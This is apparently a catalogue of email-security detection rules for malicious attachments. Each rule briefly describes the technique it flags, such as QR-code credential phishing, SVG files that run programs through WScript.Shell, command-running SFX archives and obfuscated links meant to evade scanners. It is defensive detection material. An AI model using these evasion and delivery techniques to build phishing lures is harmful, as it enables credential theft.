EXPLORE DETECTIONS
Attachment: PowerPoint with suspicious hyperlink
Attached PowerPoint contains a suspicious hyperlink that can execute arbitrary code.
Attachment: PowerShell content
Recursively scans files and archives to detect PowerShell content. While scripts are often blocked by mail filtering, alternative file formats and archived content may be employed to bypass such controls.
Attachment: Python generated PDF with link
The PDF attachment was created with a Python-based script and contains one or more links. These techniques were used by PikaBot, among others.
Attachment: QR code link with base64-encoded recipient address
Detects when an image or macro attachment contains QR codes that, when scanned, lead to URLs containing the recipient's email address. This tactic is used to uniquely track or target specific recipients and serve tailored credential phishing pages.
Attachment: QR code with credential phishing indicators
Detects messages with between 1-3 attachments containing a QR code with suspicious credential theft indicators, such as: LinkAnalysis credential phishing conclusion, decoded QR code url traverses suspicious infrastructure, the final destination is in URLhaus, decoded URL downloads a zip or executable, leverages URL shorteners, known QR abused openredirects, and more.
Attachment: QR code with encoded recipient targeting and redirect indicators
Detects QR codes in attachments that contain the recipient's email address (either plaintext or base64 encoded) and redirect through suspicious URI structures commonly associated with Kratos/SneakyLog redirection services.
Attachment: QR code with recipient targeting and special characters
Detects messages with QR code in attachments containing special characters in the path that include the recipient's email address in either the URL path or fragment, potentially encoded in base64. The URLs have a simple path structure and may end with suspicious patterns.
Attachment: QR code with suspicious URL patterns in EML file
Detects EML attachments containing QR codes that link to URLs with suspicious patterns, including specific alphanumeric combinations in subdomains and paths, or special characters followed by encoded terminators. These patterns are commonly used to evade detection in credential theft attacks.
Attachment: QR code with userinfo portion
Detects inbound messages that contain image or document attachments with QR codes containing embedded usernames, passwords, or excessively padded URLs. This technique is used to bypass traditional text-based detection methods.
Attachment: RDP connection file
Recursively scans files and archives to detect RDP connection files. Coercing a target user into connecting to an attacker-owned RDP server can expose elements of their host and potentially lead to compromise.
Attachment: RFC822 containing suspicious file sharing language with links from untrusted sender
This rule identifies messages with an RFC822 attachment contains language indicative of suspicious file-sharing activity. It checks both the original sender and the nested sender against highly trusted domains. The original message is unsolicited, and has not been previously flagged as a false positive.
Attachment: RFP/RFQ impersonating government entities
Attached RFP/RFQ impersonates a U.S. government department or entity to commit fraudulent transactions.
Attachment: RTF file with suspicious link
This rule detects RTF attachments directly attached or within an archive, containing an external link to a suspicious low reputation domain.
Attachment: RTF with embedded content
RTF files can contain embedded content similar to OLE files (Microsoft Office documents.)
Attachment: Self-sender PDF with minimal content and view prompt
Detects messages where the sender and recipient are the same address with a PDF attachment containing only 'VIEW PDF' text and a standardized body message requesting to view the attachment.
Attachment: SFX archive containing commands
Attachment is an SFX archive that contains commands that will execute when opened. This can be used to run malicious commands, and has been observed in the wild.
Attachment: Small text file with link containing recipient email address
Attach text file is less than 1000 bytes and contains a recipients email address. Seen in the wild carrying credential phishing links.
Attachment: Soda PDF producer with encryption themes
Detects an observed TTP of using Soda PDF (which offers a free trial) to produce PDFs which OCR output contains references to encryption and mentions a PDF. The PDF contains a single link which has been observed linking to a credential phishing page.
Attachment: Suspicious employee policy update document lure
Inbound message containing subject line and attachments related to handbook, compensation, or policy updates. Attachments are limited to Microsoft Word documents and match similar update-related terminology. This pattern has been observed used to delivery credential phishing via QR codes.
Attachment: Suspicious PDF created with headless browser
Detects PDF documents containing a table of contents that were generated using HeadlessChrome, Chromium with Skia/PDF, or QT with empty metadata fields - common characteristics of automated malicious document creation.
Attachment: Suspicious VBA macro
Detects any VBA macro attachment that scores above a low confidence threshold in the Sublime Macro Classifier.
Attachment: SVG file execution
Detects file execution attempts in SVG files. ActiveXObject is used to invoke WScript.Shell and run a program.
Attachment: SVG file with HTML entity encoded href attributes
Detects SVG file attachments containing href attributes with three or more consecutive HTML numeric entity references, a technique used to obfuscate malicious URLs and evade security scanning.
Attachment: SVG file with hyperlinks and cursor styling
Detects inbound messages containing SVG attachments that include clickable hyperlink elements and CSS pointer cursor styling, which may be used to deceive recipients into clicking malicious links disguised as legitimate images.